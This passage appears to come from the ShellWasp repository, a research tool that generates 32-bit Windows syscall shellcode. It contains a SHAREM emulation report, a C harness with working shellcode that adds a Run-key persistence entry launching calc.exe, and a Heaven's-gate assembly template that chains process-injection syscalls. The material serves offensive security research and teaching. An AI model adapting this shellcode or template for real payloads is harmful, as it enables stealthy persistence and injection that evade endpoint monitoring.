ecx\r\n lea edx, [esp+4]\r\n call [fs:0xc0]\r\n add esp, 4\r\n ret\r\nskipSyscall:\r\nend:\r\n" }, { "path": "Samples/alternative_create_process_SHAREM_output.txt", "content": "Output from SHAREM: https://github.com/Bw3ll/sharem\r\n\r\n\r\n [*] Emulating x86 shellcode\r\n [*] CPU counter: 358\r\n [*] Emulation complete\r\n\r\n************* APIs *************\r\n\r\n\r\n************* Syscalls *************\r\n\r\n0x1200034b NtCreateKey(PHANDLE KeyHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, ULO\r\nG TitleIndex, PUNICODE_STRING Class, ULONG CreateOptions, PUNLONG Disposition)\r\n PHANDLE KeyHandle: 0x16fffae8 -> HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\r\n ACCESS_MASK DesiredAccess: 0xf013f\r\n POBJECT_ATTRIBUTES ObjectAttributes:\r\n ULONG Length: 0x18\r\n HANDLE RootDirectory: 0x0\r\n PUNICODE_STRING ObjectName: \\Registry\\Machine\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\r\n ULONG Attributes: OBJ_CASE_INSENSITIVE\r\n PVOID SecurityDescriptor: 0x0 -> 0x0\r\n PVOID SecurityQualityOfService: 0x0 -> 0x0\r\n ULONG TitleIndex: 0x0\r\n PUNICODE_STRING Class: 0x0\r\n ULONG CreateOptions: 0x0\r\n PUNLONG Disposition: 0x0\r\n Return: NTSTATUS STATUS_SUCCESS\r\n EAX: 0x1d - (Windows 10, SP 21H1)\r\n\r\n0x1200034b NtSetValueKey(HANDLE KeyHandle, PUNICODE_STRING ValueName, ULONG TitleIndex, ULONG Type, PVOID Dat\r\n, ULONG DataSize)\r\n HANDLE KeyHandle: HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\r\n PUNICODE_STRING ValueName: 385874700\r\n ULONG TitleIndex: 0x0\r\n ULONG Type: 0x1\r\n PVOID Data: C:\\Windows\\System32\\calc.exe\r\n ULONG DataSize: 0x38\r\n Return: NTSTATUS STATUS_SUCCESS\r\n EAX: 0x60 - (Windows 10, SP 21H1)\r\n\r\n0x1200034b NtClose(HANDLE Handle)\r\n HANDLE Handle: HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\r\n Return: NTSTATUS STATUS_SUCCESS\r\n EAX: 0x3000f - (Windows 10, SP 21H1)\r\n\r\n0x1200034b NtTerminateProcess(HANDLE ProcessHandle, NTSTATUS ExitStatus)\r\n HANDLE ProcessHandle: 0x0\r\n NTSTATUS ExitStatus: STATUS_SUCCESS\r\n Return: NTSTATUS STATUS_SUCCESS\r\n EAX: 0x7002c - (Windows 10, SP 21H1)\r\n\r\n\r\n************* DLLs *************\r\nDLLs None\r\n\r\n************* Artifacts *************\r\n*** Paths ***\r\n** Misc **\r\nC:\\Windows\\System32\\calc.exe\r\n\\\\Registry\\\\Machine\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\r\n\r\n*** Files ***\r\n** Misc **\r\ncalc.exe\r\n\r\n*** EXE / DLLs ***\r\nC:\\Windows\\System32\\calc.exe\r\n\r\n*** Registry Actions ***\r\n** Add **\r\nHKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\r\n\r\n** Edit **\r\nHKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\r\nSyscall Created Key\r\nC:\\Windows\\System32\\calc.exe\r\n\r\n*** Registry Techniques ***\r\n** Persistence **\r\nHKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\r\n\r\n*** Registry Hierarchy ***\r\n** HKEY_Local_Machine **\r\nHKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\r\n\r\n*** Registry Miscellaneous ***\r\nSoftware\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\r\n" }, { "path": "Samples/alternative_create_process_tester.c", "content": "\r\n// ; Author: Shelby VandenHoek (VERONA Labs)\r\n// ; This was made to highlight the ShellWasp technique for syscall shellcode. Note - Shelby used a slightly earlier\r\n// ; version of ShellWasp, which has since changed. His shellcode still works on Win 7, 10, and 11.\r\n\r\n// ; This is a way to create persistence via registry - in this case, for calculator! \r\n\r\n// ; This is a total reworking/reimaging of an original 2005 syscall shellcode by P. Bania. The way of invoking the \r\n// ; syscall then is obsolete now, so I told Shelby (then my employee and student) to recreate it from scratch using the \r\n// ; ShellWasp technique. I had searched long and hard for any syscall shellcode that was non-Egghunter in nature, and Bania's\r\n// ; was the only one that I could find. The original had used hardcoded syscall values - clearly a practice we \r\n// ; would avoid today.\r\n\r\n// ; Original from 2005: http://piotrbania.com/all/articles/windows_syscall_shellcode.pdf\r\n\r\n// ; This is intended to a script to test the shellcode - automatically generated by SHAREM (shellcode analysis\r\n// ; framework) from the binary file. The .ASM is available separately. This program must be debugged to work \r\n// ; as it has an int 3 breakpoint in it.\r\n\r\n#include \r\n\r\n#include \r\n\r\n\r\nchar shellcode[] = \"\\x64\\x8b\\x1d\\x30\\x00\\x00\\x00\\x8b\\x9b\\xac\\x00\\x00\\x00\\x89\\xe1\\x81\\xec\\x00\\x10\\x00\\x00\\x80\\xfb\\x64\\x7c\\x10\\x68\\x2c\\x00\\x07\\x00\\x68\\x0f\\x00\\x03\\x00\\x6a\\x60\\x6a\\x1d\\xeb\\x77\\x80\\xfb\\x63\\x7c\\x10\\x68\\x2c\\x00\\x07\\x00\\x68\\x0f\\x00\\x03\\x00\\x6a\\x60\\x6a\\x1d\\xeb\\x62\\x80\\xfb\\x62\\x7c\\x0a\\x6a\\x2c\\x6a\\x0f\\x6a\\x60\\x6a\\x1d\\xeb\\x53\\x80\\xfb\\xf0\\x7c\\x10\\x68\\x2c\\x00\\x07\\x00\\x68\\x3f\\x00\\x03\\x00\\x6a\\x60\\x6a\\x1d\\xeb\\x3e\\x80\\xfb\\x61\\x7c\\x0a\\x6a\\x2c\\x6a\\x0f\\x6a\\x60\\x6a\\x1d\\xeb\\x2f\\x80\\xfb\\xbb\\x7c\\x0a\\x6a\\x2c\\x6a\\x0f\\x6a\\x60\\x6a\\x1d\\xeb\\x20\\x80\\xfb\\xba\\x7c\\x0a\\x6a\\x2c\\x6a\\x0f\\x6a\\x60\\x6a\\x1d\\xeb\\x11\\x80\\xfb\\xb1\\x0f\\x8c\\xcb\\x02\\x00\\x00\\x6a\\x29\\x6a\\x0c\\x6a\\x5d\\x6a\\x1a\\x89\\xe7\\x89\\xcc\\x81\\xec\\x00\\x04\\x00\\x00\\x31\\xd2\\x52\\xb2\\x6e\\x66\\x52\\xb2\\x75\\x66\\x52\\xb2\\x52\\x66\\x52\\xb2\\x5c\\x66\\x52\\xb2\\x6e\\x66\\x52\\xb2\\x6f\\x66\\x52\\xb2\\x69\\x66\\x52\\xb2\\x73\\x66\\x52\\xb2\\x72\\x66\\x52\\xb2\\x65\\x66\\x52\\xb2\\x56\\x66\\x52\\xb2\\x74\\x66\\x52\\xb2\\x6e\\x66\\x52\\xb2\\x65\\x66\\x52\\xb2\\x72\\x66\\x52\\xb2\\x72\\x66\\x52\\xb2\\x75\\x66\\x52\\xb2\\x43\\x66\\x52\\xb2\\x5c\\x66\\x52\\xb2\\x73\\x66\\x52\\xb2\\x77\\x66\\x52\\xb2\\x6f\\x66\\x52\\xb2\\x64\\x66\\x52\\xb2\\x6e\\x66\\x52\\xb2\\x69\\x66\\x52\\xb2\\x57\\x66\\x52\\xb2\\x5c\\x66\\x52\\xb2\\x74\\x66\\x52\\xb2\\x66\\x66\\x52\\xb2\\x6f\\x66\\x52\\xb2\\x73\\x66\\x52\\xb2\\x6f\\x66\\x52\\xb2\\x72\\x66\\x52\\xb2\\x63\\x66\\x52\\xb2\\x69\\x66\\x52\\xb2\\x4d\\x66\\x52\\xb2\\x5c\\x66\\x52\\xb2\\x65\\x66\\x52\\xb2\\x72\\x66\\x52\\xb2\\x61\\x66\\x52\\xb2\\x77\\x66\\x52\\xb2\\x74\\x66\\x52\\xb2\\x66\\x66\\x52\\xb2\\x6f\\x66\\x52\\xb2\\x53\\x66\\x52\\xb2\\x5c\\x66\\x52\\xb2\\x65\\x66\\x52\\xb2\\x6e\\x66\\x52\\xb2\\x69\\x66\\x52\\xb2\\x68\\x66\\x52\\xb2\\x63\\x66\\x52\\xb2\\x61\\x66\\x52\\xb2\\x4d\\x66\\x52\\xb2\\x5c\\x66\\x52\\xb2\\x79\\x66\\x52\\xb2\\x72\\x66\\x52\\xb2\\x74\\x66\\x52\\xb2\\x73\\x66\\x52\\xb2\\x69\\x66\\x52\\xb2\\x67\\x66\\x52\\xb2\\x65\\x66\\x52\\xb2\\x52\\x66\\x52\\xb2\\x5c\\x66\\x52\\x89\\x65\\xfc\\x31\\xd2\\x52\\xb2\\x65\\x66\\x52\\xb2\\x78\\x66\\x52\\xb2\\x65\\x66\\x52\\xb2\\x2e\\x66\\x52\\xb2\\x63\\x66\\x52\\xb2\\x6c\\x66\\x52\\xb2\\x61\\x66\\x52\\xb2\\x63\\x66\\x52\\xb2\\x5c\\x66\\x52\\xb2\\x32\\x66\\x52\\xb2\\x33\\x66\\x52\\xb2\\x6d\\x66\\x52\\xb2\\x65\\x66\\x52\\xb2\\x74\\x66\\x52\\xb2\\x73\\x66\\x52\\xb2\\x79\\x66\\x52\\xb2\\x53\\x66\\x52\\xb2\\x5c\\x66\\x52\\xb2\\x73\\x66\\x52\\xb2\\x77\\x66\\x52\\xb2\\x6f\\x66\\x52\\xb2\\x64\\x66\\x52\\xb2\\x6e\\x66\\x52\\xb2\\x69\\x66\\x52\\xb2\\x57\\x66\\x52\\xb2\\x5c\\x66\\x52\\xb2\\x3a\\x66\\x52\\xb2\\x43\\x66\\x52\\x89\\x65\\xf8\\x31\\xd2\\x52\\xb2\\x79\\x66\\x52\\xb2\\x65\\x66\\x52\\xb2\\x4b\\x66\\x52\\xb2\\x20\\x66\\x52\\xb2\\x64\\x66\\x52\\xb2\\x65\\x66\\x52\\xb2\\x74\\x66\\x52\\xb2\\x61\\x66\\x52\\xb2\\x65\\x66\\x52\\xb2\\x72\\x66\\x52\\xb2\\x43\\x66\\x52\\xb2\\x20\\x66\\x52\\xb2\\x6c\\x66\\x52\\xb2\\x6c\\x66\\x52\\xb2\\x61\\x66\\x52\\xb2\\x63\\x66\\x52\\xb2\\x73\\x66\\x52\\xb2\\x79\\x66\\x52\\xb2\\x53\\x66\\x52\\x89\\x65\\xf4\\x31\\xd2\\xff\\x75\\xf4\\x66\\xba\\x28\\x00\\x66\\x52\\x66\\xba\\x26\\x00\\x66\\x52\\x89\\x65\\xf0\\x31\\xd2\\xff\\x75\\xfc\\x66\\xba\\x80\\x00\\x66\\x52\\x66\\xba\\x7e\\x00\\x66\\x52\\x89\\x65\\xec\\x31\\xd2\\x31\\xc9\\x52\\x52\\x41\\xc1\\xe1\\x06\\x51\\xff\\x75\\xec\\x52\\x6a\\x18\\x89\\x65\\xe8\\x31\\xd2\\x52\\x89\\x65\\xe4\\x31\\xc9\\x41\\xc1\\xe1\\x04\\x89\\xca\\x49\\xc1\\xe1\\x10\\xc1\\xe2\\x02\\x4a\\x01\\xd1\\x31\\xd2\\x42\\xc1\\xe2\\x08\\x01\\xd1\\x89\\x4d\\xe0\\x57\\x31\\xd2\\x52\\x52\\x52\\x52\\xff\\x75\\xe8\\xff\\x75\\xe0\\xff\\x75\\xe4\\x8b\\x07\\xe8\\x4e\\x00\\x00\\x00\\x83\\xc4\\x1c\\x5f\\x31\\xc9\\x39\\xc8\\x75\\x32\\x57\\x31\\xd2\\x6a\\x38\\xff\\x75\\xf8\\x42\\x52\\x4a\\x52\\xff\\x75\\xf0\\x8b\\x45\\xe4\\xff\\x30\\x8b\\x47\\x04\\xe8\\x28\\x00\\x00\\x00\\x83\\xc4\\x18\\x5f\\x57\\x8b\\x45\\xe4\\xff\\x30\\x8b\\x47\\x08\\xe8\\x16\\x00\\x00\\x00\\x83\\xc4\\x04\\x5f\\x57\\x31\\xd2\\x52\\x52\\x8b\\x47\\x0c\\xe8\\x05\\x00\\x00\\x00\\x83\\xc4\\x08\\xeb\\x2b\\x64\\x8b\\x1d\\x30\\x00\\x00\\x00\\x8b\\x9b\\xa4\\x00\\x00\\x00\\x80\\xfb\\x0a\\x75\\x08\\x64\\xff\\x15\\xc0\\x00\\x00\\x00\\xc3\\x31\\xc9\\x8d\\x54\\x24\\x04\\x64\\xff\\x15\\xc0\\x00\\x00\\x00\\x83\\xc4\\x04\\xc3\";\r\n\r\n\r\n\r\n\r\n\r\nint main(int argc, char **argv) {\r\n\r\n\tHINSTANCE hInstLib = LoadLibrary(TEXT(\"user32.dll\"));\r\n\tint i = 0, len = 0, target_addy = 0, offset = 0;\r\n\tvoid*stage = VirtualAlloc(0, 3475, 0x1000,0x40 );\r\n\tprintf(\"[*] Memory allocated: 0x%08x\\n\", stage);\r\n\tlen = sizeof(shellcode);\r\n\tprintf(\"[*] Size of Shellcode: %08x\\n\", len);\r\n\tmemmove(stage, shellcode, 3475);\r\n\tprintf(\"[*] Shellcode copied\\n\");\r\n\ttarget_addy = (char*)stage + 0;\r\n\tprintf(\"[*] Adjusting offset: 0x%08x\\n\", target_addy);\r\n\t__asm {\r\n\r\n\t\tint 3\r\n\r\n\t\tmov eax, target_addy\r\n\r\n\t\tjmp eax\r\n\r\n\t}\r\n\r\n}" }, { "path": "setup.py", "content": "from setuptools import setup, find_packages\r\nimport os\r\nimport re\r\n\r\nNAME = \"ShellWasp\"\r\nVERSION = \"1.0.1\"\r\nREQUIREMENTS = [\r\n \"colorama>=0.4.4\",\r\n \"keystone-engine>=0.9.2\",\r\n\r\n]\r\n\r\nsetup(\r\n name='ShellWasp: 32-bit Syscall Shellcode Generator',\r\n author='Bramwell Brizendine',\r\n description='ShellWasp - Generating 32-bit, WoW64 shellcode with Windows Syscalls',\r\n version=VERSION,\r\n long_description=\"Words\",\r\n url='https://github.com/',\r\n include_package_data=True,\r\n packages=find_packages(),\r\n install_requires=REQUIREMENTS,\r\n classifiers=[\r\n \"Programming Language :: Python :: 3\",\r\n ],\r\n python_requires='>=3.6',\r\n)\r\n\r\n" }, { "path": "shellWasp.py", "content": "import start.shellWasp\r\n\r\nfrom start.shellWasp import *\r\nif __name__ == \"__main__\":\r\n\tprint (\"hi. i am an evil wasp.\\n\")\r\n\tsyscallMain()" }, { "path": "start/Syscall Output/Win1011_NtAllocateVirtualMemory_NtQuerySystemInformation_NtOpenProcess_20230414_143422.txt", "content": "call GetPC1\r\nGetPC1:\r\nadd [esp], 5 \r\nretf\t\t\t; Invoke Heaven's gate -- go x64\r\n\r\ndb 0x41,0x8b,0x1c,0x24\t; x64: mov ebx,dword ptr [r12]\t\r\n\t\t\r\npush 0x23\r\ncall GetPC2\r\nGetPC2:\r\nmov [esp+4], 0x23\r\nadd [esp], 0xa\r\nretf \t\t\t; Invoke Heaven's gate -- go x86\r\n\r\nmov ebx, [ebx+0x30]\r\nmov ebx, [ebx+0xac]\r\nmov ecx, esp\r\nsub esp, 0x1000\r\n\r\ncmp bl, 0xF0\t\t; 21h2, Win11 release\r\njl end\r\npush 0x18\t\t; NtAllocateVirtualMemory\r\npush 0x36\t\t; NtQuerySystemInformation\r\npush 0x26\t\t; NtOpenProcess\r\npush 0x55\t\t; NtCreateFile\r\npush 0x4a\t\t; NtCreateSection\r\npush 0x28\t\t; NtMapViewOfSection\r\npush 0x50\t\t; NtProtectVirtualMemory\r\npush 0x3a\t\t; NtWriteVirtualMemory\r\npush 0xc5\t\t; NtCreateThreadEx\r\npush 0xd0004\t\t; NtWaitForSingleObject\r\n\r\nsaveSyscallArray:\r\nmov edi, esp\r\nmov esp, ecx\r\n\r\npush edi\r\npush 0x00000000 \t; ULONG Protect\r\npush 0x00000000 \t; ULONG AllocationType\r\npush 0x00000000 \t; PSIZE_T RegionSize\r\npush 0x00000000 \t; ULONG_PTR ZeroBits\r\npush 0x00000000 \t; PVOID *BaseAddress\r\npush 0x00000000 \t; HANDLE ProcessHandle\r\n\r\nmov eax, [edi+0x24]\t; NtAllocateVirtualMemory syscall\r\ncall ourSyscall\r\n\r\nmov edi, [esp+0x18]\r\n\r\npush edi\r\npush 0x00000000 \t; PULONG ReturnLength\r\npush 0x00000000 \t; ULONG SystemInformationLength\r\npush 0x00000000 \t; PVOID SystemInformation\r\npush 0x00000000 \t; SYSTEM_INFORMATION_CLASS SystemInformationClass\r\n\r\nmov eax, [edi+0x20]\t; NtQuerySystemInformation syscall\r\ncall ourSyscall\r\n\r\nmov edi, [esp+0x10]\r\n\r\npush edi\r\npush 0x00000000 \t; PCLIENT_ID ClientId\r\npush 0x00000000 \t; POBJECT_ATTRIBUTES ObjectAttributes\r\npush 0x00000000 \t; ACCESS_MASK AccessMask\r\npush 0x00000000 \t; PHANDLE ProcessHandle\r\n\r\nmov eax, [edi+0x1c]\t; NtOpenProcess syscall\r\ncall ourSyscall\r\n\r\nmov edi, [esp+0x10]\r\n\r\npush edi\r\npush 0x00000000 \t; ULONG EaLength\r\npush 0x00000000 \t; PVOID EaBuffer\r\npush 0x00000000 \t; ULONG CreateOptions\r\npush 0x00000000 \t; ULONG CreateDisposition\r\npush 0x00000000 \t; ULONG ShareAccess\r\npush 0x00000000 \t; ULONG FileAttributes\r\npush 0x00000000 \t; PLARGE_INTEGER AllocationSize\r\npush 0x00000000 \t; PIO_STATUS_BLOCK IoStatusBlock\r\npush 0x00000000 \t; POBJECT_ATTRIBUTES ObjectAttributes\r\npush 0x00000000 \t; ACCESS_MASK DesiredAccess\r\npush 0x00000000 \t; PHANDLE FileHandle\r\n\r\nmov eax, [edi+0x18]\t; NtCreateFile syscall\r\ncall ourSyscall\r\n\r\nmov edi, [esp+0x2c]\r\n\r\npush edi\r\npush 0x00000000 \t; HANDLE FileHandle\r\npush 0x00000000 \t; ULONG AllocationAttributes\r\npush 0x00000000 \t; ULONG SectionPageProtection\r\npush 0x00000000 \t; PLARGE_INTEGER MaximumSize\r\npush 0x00000000 \t; POBJECT_ATTRIBUTES ObjectAttributes\r\npush 0x00000000 \t; ACCESS_MASK DesiredAccess\r\npush 0x00000000 \t; PHANDLE SectionHandle\r\n\r\nmov eax, [edi+0x14]\t; NtCreateSection syscall\r\ncall ourSyscall\r\n\r\nmov edi, [esp+0x1c]\r\n\r\npush edi\r\npush 0x00000000 \t; ULONG Protect\r\npush 0x00000000 \t; ULONG AllocationType\r\npush 0x00000000 \t; DWORD InheritDisposition\r\npush 0x00000000 \t; PULONG ViewSize\r\npush 0x00000000 \t; PLARGE_INTEGER SectionOffset\r\npush 0x00000000 \t; ULONG CommitSize\r\npush 0x00000000 \t; ULONG ZeroBits\r\npush 0x00000000 \t; PVOID *BaseAddress\r\npush 0x00000000 \t; HANDLE ProcessHandle\r\npush 0x00000000 \t; HANDLE SectionHandle\r\n\r\nmov eax, [edi+0x10]\t; NtMapViewOfSection syscall\r\ncall ourSyscall\r\n\r\nmov edi, [esp+0x28]\r\n\r\npush edi\r\npush 0x00000000 \t; PULONG OldAccessProtection\r\npush 0x00000000 \t; ULONG NewAccessProtection\r\npush 0x00000000 \t; PULONG NumberOfBytesToProtect\r\npush 0x00000000 \t; PVOID *BaseAddress\r\npush 0x00000000 \t; HANDLE ProcessHandle\r\n\r\nmov eax, [edi+0xc]\t; NtProtectVirtualMemory syscall\r\ncall ourSyscall\r\n\r\nmov edi, [esp+0x14]\r\n\r\npush edi\r\npush 0x00000000 \t; PULONG NumberOfBytesWritten\r\npush 0x00000000 \t; ULONG NumberOfBytesToWrite\r\npush 0x00000000 \t; PVOID Buffer\r\npush 0x00000000 \t; PVOID BaseAddress\r\npush 0x00000000 \t; HANDLE ProcessHandle\r\n\r\nmov eax, [edi+0x8]\t; NtWriteVirtualMemory syscall\r\ncall ourSyscall\r\n\r\nmov edi, [esp+0x14]\r\n\r\npush edi\r\npush 0x00000000 \t; PVOID AttributeList\r\npush 0x00000000 \t; ULONG MaximumStackSize\r\npush 0x00000000 \t; ULONG StackSize\r\npush 0x00000000 \t; ULONG ZeroBits\r\npush 0x00000000 \t; ULONG CreateFlags\r\npush 0x00000000 \t; PVOID Argument\r\npush 0x00000000 \t; PVOID StartR__OUTine\r\npush 0x00000000 \t; HANDLE ProcessHandle\r\npush 0x00000000 \t; POBJECT_ATTRIBUTES ObjectAttributes\r\npush 0x00000000 \t; ACCESS_MASK DesiredAccess\r\npush 0x00000000 \t; PHANDLE ThreadHandle\r\n\r\nmov eax, [edi+0x4]\t; NtCreateThreadEx syscall\r\ncall ourSyscall\r\n\r\nmov edi, [esp+0x2c]\r\n\r\npush edi\r\npush 0x00000000 \t; PLARGE_INTEGER TimeOut\r\npush 0x00000000 \t; BOOLEAN Alertable\r\npush 0x00000000 \t; HANDLE ObjectHandle\r\n\r\nmov eax, [edi]\t\t; NtWaitForSingleObject syscall\r\ncall ourSyscall\r\n\r\nmov edi, [esp+0xc]\r\n\r\njmp end\r\n\r\nourSyscall:\t\t; Syscall Function\r\npush 0x33\t\t; Push 0x33 selector for 64-bit\r\ncall nextRetf\t\t; GetPC\r\nnextRetf:\r\nadd [esp], 5\t\t; Create destination for Heaven's gate\r\nretf\t\t\t; Invoke Heaven's gate--transition to x64 code\r\ndb 0x49,0x87,0xe6,0x45,0x8b,0x06,0x49,0x83,0xc6,0x04,0x45,0x89,0x45,0x3c,0x45,0x89,0x75,0x48,0x49,\r\n0x83,0xee,0x04,0x4d,0x8d,0x5e,0x04,0x41,0x89,0x7d,0x20,0x41,0x89,0x75,0x24,0x41,0x89,0x5d,0x28,0x41,\r\n0x89,0x6d,0x38,0x9c,0x41,0x58,0x45,0x89,0x45,0x44,0x89,0xc1,0xc1,0xe9,0x10,0x41,0xff,0x24,0xcf\r\n\t\t\t; x64 code as bytes, leading to syscall\r\n\t\t\t; xchg rsp,r14\r\n\t\t\t; mov r8d,dword ptr [r14]\r\n\t\t\t; add r14,4\r\n\t\t\t; mov dword ptr [r13+3Ch],r8d\t # Save x86 EIP\r\n\t\t\t; mov dword ptr [r13+48h],r14d\t # Save x86 ESP\r\n\t\t\t; sub r14,4\r\n\t\t\t; lea r11,[r14+4] \t # Pointer to syscall args\r\n\t\t\t; mov dword ptr [r13+20h],edi\t # Save 32-bit registers\r\n\t\t\t; mov dword ptr [r13+24h],esi\t # into WOW64_CONTEXT\r\n\t\t\t; mov dword ptr [r13+28h],ebx\r\n\t\t\t; mov dword ptr [r13+38h],ebp\r\n\t\t\t; pushfq \r\n\t\t\t; pop r8 \t # Save x86 EFlags\r\n\t\t\t; mov dword ptr [r13+44h],r8d\r\n\t\t\t; mov ecx,eax\r\n\t\t\t; shr ecx,10h \t # Get TurboThunk, if needed\r\n\t\t\t; jmp qword ptr [r15+rcx*8]\r\n\t\t\t\r\n\r\nend:\r\nnop\r\n" }, { "path": "start/WinDbgList.txt", "content": "\r\nwinDbgList\r\nu ntdll!NtAccessCheck L2\r\nu ntdll!NtAccessCheckAndAuditAlarm L2\r\nu ntdll!NtAccessCheckByType L2\r\nu ntdll!NtAccessCheckByTypeAndAuditAlarm L2\r\nu ntdll!NtAccessCheckByTypeResultList L2\r\nu ntdll!NtAccessCheckByTypeResultListAndAuditAlarm L2\r\nu ntdll!NtAccessCheckByTypeResultListAndAuditAlarmByHandle L2\r\nu ntdll!NtAcquireCrossVmMutant L2\r\nu ntdll!NtAcquireProcessActivityReference L2\r\nu ntdll!NtAddAtom L2\r\nu ntdll!NtAddAtomEx L2\r\nu ntdll!NtAddBootEntry L2\r\nu ntdll!NtAddDriverEntry L2\r\nu ntdll!NtAdjustGroupsToken L2\r\nu ntdll!NtAdjustPrivilegesToken L2\r\nu ntdll!NtAdjustTokenClaimsAndDeviceGroups L2\r\nu ntdll!NtAlertResumeThread L2\r\nu ntdll!NtAlertThread L2\r\nu ntdll!NtAlertThreadByThreadId L2\r\nu ntdll!NtAllocateLocallyUniqueId L2\r\nu ntdll!NtAllocateReserveObject L2\r\nu ntdll!NtAllocateUserPhysicalPages L2\r\nu ntdll!NtAllocateUserPhysicalPagesEx L2\r\nu ntdll!NtAllocateUuids L2\r\nu ntdll!NtAllocateVirtualMemory L2\r\nu ntdll!NtAllocateVirtualMemoryEx L2\r\nu ntdll!NtAlpcAcceptConnectPort L2\r\nu ntdll!NtAlpcCancelMessage L2\r\nu ntdll!NtAlpcConnectPort L2\r\nu ntdll!NtAlpcConnectPortEx L2\r\nu ntdll!NtAlpcCreatePort L2\r\nu ntdll!NtAlpcCreatePortSection L2\r\nu ntdll!NtAlpcCreateResourceReserve L2\r\nu ntdll!NtAlpcCreateSectionView L2\r\nu ntdll!NtAlpcCreateSecurityContext L2\r\nu ntdll!NtAlpcDeletePortSection L2\r\nu ntdll!NtAlpcDeleteResourceReserve L2\r\nu ntdll!NtAlpcDeleteSectionView L2\r\nu ntdll!NtAlpcDeleteSecurityContext L2\r\nu ntdll!NtAlpcDisconnectPort L2\r\nu ntdll!NtAlpcImpersonateClientContainerOfPort L2\r\nu ntdll!NtAlpcImpersonateClientOfPort L2\r\nu ntdll!NtAlpcOpenSenderProcess L2\r\nu ntdll!NtAlpcOpenSenderThread L2\r\nu ntdll!NtAlpcQueryInformation L2\r\nu ntdll!NtAlpcQueryInformationMessage L2\r\nu ntdll!NtAlpcRevokeSecurityContext L2\r\nu ntdll!NtAlpcSendWaitReceivePort L2\r\nu ntdll!NtAlpcSetInformation L2\r\nu ntdll!NtApphelpCacheControl L2\r\nu ntdll!NtAreMappedFilesTheSame L2\r\nu ntdll!NtAssignProcessToJobObject L2\r\nu ntdll!NtAssociateWaitCompletionPacket L2\r\nu ntdll!NtCallEnclave L2\r\nu ntdll!NtCallbackReturn L2\r\nu ntdll!NtCancelIoFile L2\r\nu ntdll!NtCancelIoFileEx L2\r\nu ntdll!NtCancelSynchronousIoFile L2\r\nu ntdll!NtCancelTimer L2\r\nu ntdll!NtCancelTimer2 L2\r\nu ntdll!NtCancelWaitCompletionPacket L2\r\nu ntdll!NtChangeProcessState L2\r\nu ntdll!NtChangeThreadState L2\r\nu ntdll!NtClearEvent L2\r\nu ntdll!NtClose L2\r\nu ntdll!NtCloseObjectAuditAlarm L2\r\nu ntdll!NtCommitComplete L2\r\nu ntdll!NtCommitEnlistment L2\r\nu ntdll!NtCommitRegistryTransaction L2\r\nu ntdll!NtCommitTransaction L2\r\nu ntdll!NtCompactKeys L2\r\nu ntdll!NtCompareObjects L2\r\nu ntdll!NtCompareSigningLevels L2\r\nu ntdll!NtCompareTokens L2\r\nu ntdll!NtCompleteConnectPort L2\r\nu ntdll!NtCompressKey L2\r\nu ntdll!NtConnectPort L2\r\nu ntdll!NtContinue L2\r\nu ntdll!NtContinueEx L2\r\nu ntdll!NtConvertBetweenAuxiliaryCounterAndPerformanceCounter L2\r\nu ntdll!NtCreateCrossVmEvent L2\r\nu ntdll!NtCreateCrossVmMutant L2\r\nu ntdll!NtCreateDebugObject L2\r\nu ntdll!NtCreateDirectoryObject L2\r\nu ntdll!NtCreateDirectoryObjectEx L2\r\nu ntdll!NtCreateEnclave L2\r\nu ntdll!NtCreateEnlistment L2\r\nu ntdll!NtCreateEvent L2\r\nu ntdll!NtCreateEventPair L2\r\nu ntdll!NtCreateFile L2\r\nu ntdll!NtCreateIRTimer L2\r\nu ntdll!NtCreateIoCompletion L2\r\nu ntdll!NtCreateIoRing L2\r\nu ntdll!NtCreateJobObject L2\r\nu ntdll!NtCreateJobSet L2\r\nu ntdll!NtCreateKey L2\r\nu ntdll!NtCreateKeyTransacted L2\r\nu ntdll!NtCreateKeyedEvent L2\r\nu ntdll!NtCreateLowBoxToken L2\r\nu ntdll!NtCreateMailslotFile L2\r\nu ntdll!NtCreateMutant L2\r\nu ntdll!NtCreateNamedPipeFile L2\r\nu ntdll!NtCreatePagingFile L2\r\nu ntdll!NtCreatePartition L2\r\nu ntdll!NtCreatePort L2\r\nu ntdll!NtCreatePrivateNamespace L2\r\nu ntdll!NtCreateProcess L2\r\nu ntdll!NtCreateProcessEx L2\r\nu ntdll!NtCreateProcessStateChange L2\r\nu ntdll!NtCreateProfile L2\r\nu ntdll!NtCreateProfileEx L2\r\nu ntdll!NtCreateRegistryTransaction L2\r\nu ntdll!NtCreateResourceManager L2\r\nu ntdll!NtCreateSection L2\r\nu ntdll!NtCreateSectionEx L2\r\nu ntdll!NtCreateSemaphore L2\r\nu ntdll!NtCreateSymbolicLinkObject L2\r\nu ntdll!NtCreateThread L2\r\nu ntdll!NtCreateThreadEx L2\r\nu ntdll!NtCreateThreadStateChange L2\r\nu ntdll!NtCreateTimer L2\r\nu ntdll!NtCreateTimer2 L2\r\nu ntdll!NtCreateToken L2\r\nu ntdll!NtCreateTokenEx L2\r\nu ntdll!NtCreateTransaction L2\r\nu ntdll!NtCreateTransactionManager L2\r\nu ntdll!NtCreateUserProcess L2\r\nu ntdll!NtCreateWaitCompletionPacket L2\r\nu ntdll!NtCreateWaitablePort L2\r\nu ntdll!NtCreateWnfStateName L2\r\nu ntdll!NtCreateWorkerFactory L2\r\nu ntdll!NtDebugActiveProcess L2\r\nu ntdll!NtDebugContinue L2\r\nu ntdll!NtDelayExecution L2\r\nu ntdll!NtDeleteAtom L2\r\nu ntdll!NtDeleteBootEntry L2\r\nu ntdll!NtDeleteDriverEntry L2\r\nu ntdll!NtDeleteFile L2\r\nu ntdll!NtDeleteKey L2\r\nu ntdll!NtDeleteObjectAuditAlarm L2\r\nu ntdll!NtDeletePrivateNamespace L2\r\nu ntdll!NtDeleteValueKey L2\r\nu ntdll!NtDeleteWnfStateData L2\r\nu 